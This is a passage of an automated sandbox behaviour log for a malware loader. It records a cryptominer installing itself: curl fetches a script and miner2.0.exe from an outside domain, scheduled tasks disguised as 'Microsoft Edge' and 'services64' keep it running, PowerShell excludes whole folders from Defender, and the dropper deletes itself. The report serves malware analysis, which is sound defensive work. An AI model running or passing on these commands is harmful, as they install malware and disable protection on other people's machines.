                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.phpJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript conf.vbsJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401550 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_00401550
                        Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C3D312 cpuid 6_2_00C3D312
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
